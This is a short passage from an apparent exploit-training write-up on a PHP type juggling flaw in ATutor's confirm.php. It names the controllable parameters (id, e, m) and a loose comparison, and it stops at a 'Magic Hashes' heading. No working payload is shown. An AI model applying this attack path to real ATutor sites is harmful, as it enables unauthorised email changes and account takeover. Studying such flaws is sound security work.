In this section we will exploit the Type Juggling vulnerablity in the ATutor Application.
let’s look at the “confirm.php” code.
find /opt/lampp/htdocs/ATutor/ -type f -name confirm.php 2>/dev/null
now let’s see the code.
As shown below notice that the code is checking for the precence of the “e”, ”id” and “m” parameters then it’s casting the value of the id to integer the using trim for the value “e”
then as below the code is checking if there is an entry by checking the creation date from the database.
now from this code we can control 3 variables
id —> unique id for the users.
e —> new email to be updated
m —> checking if we van update the email in loose comparison.
Magic Hashes.